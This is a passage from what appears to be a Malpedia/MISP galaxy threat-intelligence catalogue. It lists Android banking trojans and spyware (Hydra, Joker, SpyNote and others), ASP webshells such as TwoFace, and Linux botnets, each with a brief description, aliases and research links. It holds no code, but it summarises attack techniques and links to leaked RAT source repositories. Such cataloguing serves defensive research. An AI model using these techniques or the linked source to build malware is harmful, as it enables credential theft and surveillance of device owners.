Hydra

Avira states that Hydra is an Android BankBot variant, a type of malware designed to steal banking credentials. The way it does this is by requesting the user enables dangerous permissions such as accessibility and every time the banking app is opened, the malware is hijacking the user by overwriting the legit banking application login page with a malicious one. The goal is the same, to trick the user to enter his login credentials so that it will go straight to the malware authors.

The tag is: misp-galaxy:malpedia="Hydra"

Hydra is also known as:

Table 2146. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra

https://cryptax.medium.com/android-bianlian-payload-61febabed00a

https://twitter.com/muha2xmad/status/1570788983474638849

https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0

https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726

https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/

https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221

https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html

https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace

https://muha2xmad.github.io/malware-analysis/hydra/

https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5

https://www.threatfabric.com/blogs/2020_year_of_the_rat.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/

IRATA

According to redpiranha, IRATA (Iranian Remote Access Trojan) Android Malware is a new malware detected in the wild. It originates from a phishing attack through SMS. The theme of the message resembles information coming from the government that will ask you to download this malicious application. IRATA can collect sensitive information from your mobile phone including bank details. Since it infects your mobile, it can also gather your SMS messages which then can be used to obtain 2FA tokens.

The tag is: misp-galaxy:malpedia="IRATA"

IRATA is also known as:

Table 2148. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.irata

https://onecert.ir/portal/blog/irata

https://twitter.com/muha2xmad/status/1562831996078157826

https://muha2xmad.github.io/malware-analysis/irata/

JadeRAT

The tag is: misp-galaxy:malpedia="JadeRAT"

JadeRAT is also known as:

Table 2150. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat

https://blog.lookout.com/mobile-threat-jaderat

Joker

Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google’s official app store with the help of its trail signatures which includes updating the virus’s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users’ personal information including contact details, device data, WAP services, and SMS messages.

The tag is: misp-galaxy:malpedia="Joker"

Joker is also known as:

  • Bread

Table 2151. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker

https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/

https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451

https://www.microsoft.com/security/blog/2022/06/30/toll-fraud-malware-how-an-android-application-can-drain-your-wallet/

https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/

https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus

https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html

https://cryptax.medium.com/tracking-android-joker-payloads-with-medusa-static-analysis-and-patience-672348b81ac2

https://muha2xmad.github.io/malware-analysis/hydra/

https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks—​using-github-to-hide-its-payload.html

https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/

https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1

https://labs.k7computing.com/?p=22199

Koler

The tag is: misp-galaxy:malpedia="Koler"

Koler is also known as:

Table 2154. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler

https://twitter.com/LukasStefanko/status/928262059875213312

Loki

The tag is: misp-galaxy:malpedia="Loki"

Loki is also known as:

Table 2157. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki

http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/

LuckyCat

The tag is: misp-galaxy:malpedia="LuckyCat"

LuckyCat is also known as:

Table 2159. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.luckycat

https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html

MasterFred

According to heimdal, MasterFred malware, this is designed as an Android trojan that makes use of false login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The hackers’ goal is to steal credit card information.

The tag is: misp-galaxy:malpedia="MasterFred"

MasterFred is also known as:

  • Brox

Table 2162. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.masterfred

https://twitter.com/AvastThreatLabs/status/1458162276708483073

Medusa (Android)

According to ThreatFabric, this is an Android banking trojan under active development as of July 2020. It is using TCP for C&C communication and targets Turkish banks.

The tag is: misp-galaxy:malpedia="Medusa (Android)"

Medusa (Android) is also known as:

  • Gorgona

Table 2164. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa

https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html

https://twitter.com/ThreatFabric/status/1285144962695340032

https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html

MobileOrder

Check Point has identified samples of this spyware being distributed since 2015. No samples were found on Google Play, meaning they were likely through other channels like social engineering.

The tag is: misp-galaxy:malpedia="MobileOrder"

MobileOrder is also known as:

Table 2166. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.mobile_order

https://research.checkpoint.com/2022/never-truly-left-7-years-of-scarlet-mimics-mobile-surveillance-campaign-targeting-uyghurs/

Monokle

Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques as well as the ability to install an attacker-specified certificate to the trusted certificates on an infected device that would allow for man-in-the-middle (MITM) attacks. According to Lookout researchers, It is believed to be developed by Special Technology Center (STC), which is a Russian defense contractor sanctioned by the U.S. Government in connection to alleged interference in the 2016 US presidential elections.

The tag is: misp-galaxy:malpedia="Monokle"

Monokle is also known as:

Table 2167. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.monokle

https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf

MoqHao

The tag is: misp-galaxy:malpedia="MoqHao"

MoqHao is also known as:

  • Shaoye

  • XLoader

Table 2168. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao

https://www.xanhacks.xyz/p/moqhao-malware-analysis

https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1

https://securelist.com/roaming-mantis-part-v/96250/

https://team-cymru.com/blog/2021/08/11/moqhao-part-1-5-high-level-trends-of-recent-campaigns-targeting-japan/

https://www.telekom.com/en/blog/group/article/moqhao-masters-new-tricks-1031484

https://www.team-cymru.com/post/moqhao-part-3-recent-global-targeting-trends

https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html

https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/

https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/

https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/

https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/

https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681

https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf

https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/

https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/

https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf

MOrder RAT

The tag is: misp-galaxy:malpedia="MOrder RAT"

MOrder RAT is also known as:

Table 2169. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.morder_rat

https://www.ctfiot.com/138538.html

Mudwater

The tag is: misp-galaxy:malpedia="Mudwater"

Mudwater is also known as:

Table 2170. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.mudwater

https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf

MysteryBot

MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.

The tag is: misp-galaxy:malpedia="MysteryBot"

MysteryBot is also known as:

Table 2171. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot

https://www.threatfabric.com/blogs/mysterybota_new_android_banking_trojan_ready_for_android_7_and_8.html

PackChat

The tag is: misp-galaxy:malpedia="PackChat"

PackChat is also known as:

Table 2175. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.packchat

https://news.sophos.com/en-us/2021/01/12/new-android-spyware-targets-users-in-pakistan/

PhoneSpy

According to Zimperium, PhoneSpy is a spyware aimed at South Korean residents with Android devices.

The tag is: misp-galaxy:malpedia="PhoneSpy"

PhoneSpy is also known as:

Table 2177. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.phonespy

https://blog.zimperium.com/phonespy-the-app-based-cyberattack-snooping-south-korean-citizens/

PINEFLOWER

According to Mandiant, PINEFLOWER is an Android malware family capable of a wide range of backdoor functionality, including stealing system inform information, logging and recording phone calls, initiating audio recordings, reading SMS inboxes and sending SMS messages. The malware also has features to facilitate device location tracking, deleting, downloading, and uploading files, reading connectivity state, speed, and activity, and toggling Bluetooth, Wi-Fi, and mobile data settings.

The tag is: misp-galaxy:malpedia="PINEFLOWER"

PINEFLOWER is also known as:

Table 2178. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.pineflower

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

PixPirate

According to PCrisk, The PixPirate is a dangerous Android banking Trojan that has the capability to carry out ATS (Automatic Transfer System) attacks. This allows threat actors to automatically transfer funds through the Pix Instant Payment platform, which numerous Brazilian banks use.

In addition to launching ATS attacks, PixPirate can intercept and delete SMS messages, prevent the uninstallation process, and carry out malvertising attacks.

The tag is: misp-galaxy:malpedia="PixPirate"

PixPirate is also known as:

Table 2179. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.pixpirate

https://www.cleafy.com/cleafy-labs/pixpirate-a-new-brazilian-banking-trojan

Podec

The tag is: misp-galaxy:malpedia="Podec"

Podec is also known as:

Table 2182. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.podec

https://securelist.com/jack-of-all-trades/83470/

Fake Pornhub

The tag is: misp-galaxy:malpedia="Fake Pornhub"

Fake Pornhub is also known as:

Table 2184. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub

Premier RAT

The tag is: misp-galaxy:malpedia="Premier RAT"

Premier RAT is also known as:

Table 2185. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.premier_rat

https://twitter.com/LukasStefanko/status/1084774825619537925

Rafel RAT

The tag is: misp-galaxy:malpedia="Rafel RAT"

Rafel RAT is also known as:

Table 2186. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.rafelrat

https://github.com/swagkarna/Rafel-Rat

Rana

The tag is: misp-galaxy:malpedia="Rana"

Rana is also known as:

Table 2188. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.rana

https://blog.reversinglabs.com/blog/rana-android-malware

RatMilad

RatMilad, a newly discovered Android spyware, has been stealing data from mobile devices in the Middle East. The malware is spread through links on social media and pretends to be applications for services like VPN and phone number spoofing. Unwary users download these trojan applications and grant access to malware.

The tag is: misp-galaxy:malpedia="RatMilad"

RatMilad is also known as:

Table 2189. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ratmilad

https://socradar.io/new-spyware-ratmilad-targets-middle-eastern-mobile-devices

Raxir

The tag is: misp-galaxy:malpedia="Raxir"

Raxir is also known as:

Table 2190. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir

https://twitter.com/PhysicalDrive0/statuses/798825019316916224

RedAlert2

RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server. The malware also has the ability to block incoming calls from banks, to prevent the victim of being notified. As a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.

The tag is: misp-galaxy:malpedia="RedAlert2"

RedAlert2 is also known as:

Table 2191. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2

https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores

RemRAT

The tag is: misp-galaxy:malpedia="RemRAT"

RemRAT is also known as:

Table 2192. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.remrat

https://blogs.360.cn/post/analysis-of-RemRAT.html

Retefe (Android)

The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim’s phone doesn’t get infected.

The tag is: misp-galaxy:malpedia="Retefe (Android)"

Retefe (Android) is also known as:

Table 2193. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe

http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html

http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html

http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html

http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html

https://www.govcert.admin.ch/blog/33/the-retefe-saga

http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/

Revive

According to PCrisk, Revive is the name of a banking Trojan targeting Android users (customers of a specific Spanish bank). It steals sensitive information. Cybercriminals use Revive to take ownership of online accounts using stolen login credentials. This malware abuses Accessibility Services to perform malicious activities.

The tag is: misp-galaxy:malpedia="Revive"

Revive is also known as:

Table 2194. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.revive

https://www.cleafy.com/cleafy-labs/revive-from-spyware-to-android-banking-trojan

Sauron Locker

The tag is: misp-galaxy:malpedia="Sauron Locker"

Sauron Locker is also known as:

Table 2199. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.sauron_locker

https://twitter.com/LukasStefanko/status/1117795290155819008

SideWinder (Android)

SideWinder involved a fake VPN app for Android devices published on Google Play Store along with a custom tool that filters victims for better targeting.

The tag is: misp-galaxy:malpedia="SideWinder (Android)"

SideWinder (Android) is also known as:

Table 2201. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.sidewinder

https://ti.qianxin.com/blog/articles/analysis-of-malware-android-software-spread-by-sidewinder-using-google-play/

https://www.group-ib.com/blog/hunting-sidewinder/

SilkBean

The tag is: misp-galaxy:malpedia="SilkBean"

SilkBean is also known as:

Table 2202. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.silkbean

https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf

Skygofree

The tag is: misp-galaxy:malpedia="Skygofree"

Skygofree is also known as:

Table 2203. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree

https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/

SMSspy

The tag is: misp-galaxy:malpedia="SMSspy"

SMSspy is also known as:

Table 2207. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy

SpyC23

The tag is: misp-galaxy:malpedia="SpyC23"

SpyC23 is also known as:

Table 2210. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.spyc23

https://www.welivesecurity.com/2020/09/30/aptc23-group-evolves-its-android-spyware/

SpyNote

The malware has been released on github at https://github.com/EVLF/Cypher-Rat-Source-Code

The tag is: misp-galaxy:malpedia="SpyNote"

SpyNote is also known as:

  • CypherRat

Table 2212. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote

https://ti.qianxin.com/blog/articles/Blade-hawk-The-activities-of-targeted-the-Middle-East-and-West-Asia-are-exposed/

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://www.cleafy.com/cleafy-labs/spynote-continues-to-attack-financial-institutions

https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions

https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr

https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions.html

https://www.civilsphereproject.org/blog/2021/9/21/capturing-and-detecting-androidtester-remote-access-trojan-with-the-emergency-vpn

https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/

https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/

https://labs.k7computing.com/index.php/spynote-targets-irctc-users/

https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w

https://labs.k7computing.com/index.php/spynote-an-android-snooper/

https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan

https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA

https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/

StealthAgent

The tag is: misp-galaxy:malpedia="StealthAgent"

StealthAgent is also known as:

Table 2213. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent

https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF

Stealth Mango

The tag is: misp-galaxy:malpedia="Stealth Mango"

Stealth Mango is also known as:

Table 2214. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango

https://www.lookout.com/info/stealth-mango-report-ty

https://www.lookout.com/blog/stealth-mango

Switcher

The tag is: misp-galaxy:malpedia="Switcher"

Switcher is also known as:

Table 2216. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher

https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/

TangleBot

The tag is: misp-galaxy:malpedia="TangleBot"

TangleBot is also known as:

Table 2218. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.tangle_bot

https://www.proofpoint.com/us/blog/threat-insight/mobile-malware-tanglebot-untangled

TemptingCedar Spyware

The tag is: misp-galaxy:malpedia="TemptingCedar Spyware"

TemptingCedar Spyware is also known as:

Table 2220. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar

https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware

TianySpy

According to Trend Micro, this malware appears to have been designed to steal credentials associated with membership websites of major Japanese telecommunication services.

The tag is: misp-galaxy:malpedia="TianySpy"

TianySpy is also known as:

Table 2222. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.tianyspy

https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html

TinyZ

The tag is: misp-galaxy:malpedia="TinyZ"

TinyZ is also known as:

  • Catelites Android Bot

  • MarsElite Android Bot

Table 2223. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz

http://blog.group-ib.com/cron

Triout

Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.

The tag is: misp-galaxy:malpedia="Triout"

Triout is also known as:

Table 2226. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout

UltimaSMS

The tag is: misp-galaxy:malpedia="UltimaSMS"

UltimaSMS is also known as:

Table 2227. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.ultima_sms

https://blog.avast.com/premium-sms-scam-apps-on-play-store-avast

Unidentified APK 001

The tag is: misp-galaxy:malpedia="Unidentified APK 001"

Unidentified APK 001 is also known as:

Table 2228. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001

https://www.welivesecurity.com/2017/02/14/new-android-trojan-mimics-user-clicks-download-dangerous-malware/

Unidentified APK 002

The tag is: misp-galaxy:malpedia="Unidentified APK 002"

Unidentified APK 002 is also known as:

Table 2229. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002

Unidentified APK 004

According to Check Point Research, this is a RAT that is disguised as a set of dating apps like "GrixyApp", "ZatuApp", "Catch&See", including dedicated websites to conceal their malicious purpose.

The tag is: misp-galaxy:malpedia="Unidentified APK 004"

Unidentified APK 004 is also known as:

Table 2230. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_004

https://research.checkpoint.com/2020/hamas-android-malware-on-idf-soldiers-this-is-how-it-happened/

Unidentified APK 005

The tag is: misp-galaxy:malpedia="Unidentified APK 005"

Unidentified APK 005 is also known as:

Table 2231. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005

Unidentified 007 (ARMAAN RAT)

According to Cyble, this is an Android application that pretends to be the legitimate application for the Army Mobile Aadhaar App Network (ARMAAN), intended to be used by Indian army personnel. The application was customized to include RAT functionality.

The tag is: misp-galaxy:malpedia="Unidentified 007 (ARMAAN RAT)"

Unidentified 007 (ARMAAN RAT) is also known as:

Table 2233. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_007

https://blog.cyble.com/2022/01/28/indian-army-personnel-face-remote-access-trojan-attacks/

Unidentified APK 008

Android malware distributed through fake shopping websites targeting Malaysian users, targeting banking information.

The tag is: misp-galaxy:malpedia="Unidentified APK 008"

Unidentified APK 008 is also known as:

Table 2234. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_008

https://www.welivesecurity.com/2022/04/06/fake-eshops-prowl-banking-credentials-android-malware/

vamp

Related to the micropsia windows malware and also sometimes named micropsia.

The tag is: misp-galaxy:malpedia="vamp"

vamp is also known as:

  • android.micropsia

Table 2236. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.vamp

https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/

VINETHORN

According to Mandiant, VINETHORN is an Android malware family capable of a wide range of backdoor functionality. It can steal system information, read SMS inboxes, send SMS messages, access contact lists and call histories, record audio and video, and track device location via GPS.

The tag is: misp-galaxy:malpedia="VINETHORN"

VINETHORN is also known as:

Table 2237. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.vinethorn

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

Wroba

According to Avira, this is a banking trojan targeting Japan.

The tag is: misp-galaxy:malpedia="Wroba"

Wroba is also known as:

Table 2242. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.wroba

https://securelist.com/roaming-mantis-reaches-europe/105596/

https://www.avira.com/en/blog/the-android-banking-trojan-wroba-shifts-attack-from-south-korea-to-target-users-in-japan

xHelper

The tag is: misp-galaxy:malpedia="xHelper"

xHelper is also known as:

Table 2246. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.xhelper

https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/

XploitSPY

The tag is: misp-galaxy:malpedia="XploitSPY"

XploitSPY is also known as:

Table 2247. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.xploitspy

https://twitter.com/malwrhunterteam/status/1249768400806653952

YellYouth

The tag is: misp-galaxy:malpedia="YellYouth"

YellYouth is also known as:

Table 2249. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.yellyouth

https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html

Zanubis

According to cyware, Zanubis malware pretends to be a malicious PDF application. The threat actor uses it as a key to decrypt responses received from the C2 server.

The tag is: misp-galaxy:malpedia="Zanubis"

Zanubis is also known as:

Table 2250. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.zanubis

https://labs.k7computing.com/index.php/an-upsurge-of-new-android-banking-trojan-zanubis/

Zen

The tag is: misp-galaxy:malpedia="Zen"

Zen is also known as:

Table 2251. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.zen

https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html

Nightrunner

WebShell.

The tag is: misp-galaxy:malpedia="Nightrunner"

Nightrunner is also known as:

Table 2254. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/asp.nightrunner

https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/

TwoFace

According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.

The secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader that will be in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload are execution of programs, up-, download and deletion of files and capability to manipulate MAC timestamps.

The tag is: misp-galaxy:malpedia="TwoFace"

TwoFace is also known as:

  • HighShell

  • HyperShell

  • Minion

  • SEASHARPEE

Table 2256. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface

https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/

https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/

https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view

https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf

https://www.secureworks.com/research/threat-profiles/cobalt-gypsy

https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf

https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf

https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI

https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/

https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/

https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae

https://unit42.paloaltonetworks.com/atoms/evasive-serpens/

https://www.youtube.com/watch?v=GjquFKa4afU

Unidentified ASP 001 (Webshell)

The tag is: misp-galaxy:malpedia="Unidentified ASP 001 (Webshell)"

Unidentified ASP 001 (Webshell) is also known as:

Table 2257. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001

Abcbot

Abcbot is a modular Go-based botnet and malware that propagates via exploits and brute force attempts. The botnet was observed launching DDoS attacks, perform internet scans, and serve web pages. It is probably linked to Xanthe-based clipjacking campaign.

The tag is: misp-galaxy:malpedia="Abcbot"

Abcbot is also known as:

Table 2258. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.abcbot

https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/

https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/

https://www.cadosecurity.com/the-continued-evolution-of-abcbot/

https://www.lacework.com/blog/abc-botnet-attacks-on-the-rise/

Abyss Locker

Family based on HelloKitty Ransomware. Encryption algorithm changed from AES to ChaCha. Sample seems to be unpacked.

The tag is: misp-galaxy:malpedia="Abyss Locker"

Abyss Locker is also known as:

  • elf.hellokitty

Table 2259. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.abyss

https://www.bleepingcomputer.com/news/security/linux-version-of-abyss-locker-ransomware-targets-vmware-esxi-servers/

ACBackdoor (ELF)

A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.

The tag is: misp-galaxy:malpedia="ACBackdoor (ELF)"

ACBackdoor (ELF) is also known as:

Table 2260. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.acbackdoor

https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba

https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

AirDropBot

AirDropBot is used to create a DDoS botnet. It spreads as a worm, currently targeting Linksys routers. Backdoor and other bot functionality is present in this family. Development seems to be ongoing.

The tag is: misp-galaxy:malpedia="AirDropBot"

AirDropBot is also known as:

  • CloudBot

Table 2263. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.airdrop

https://blog.malwaremustdie.org/2019/09/mmd-0064-2019-linuxairdropbot.html

Aisuru

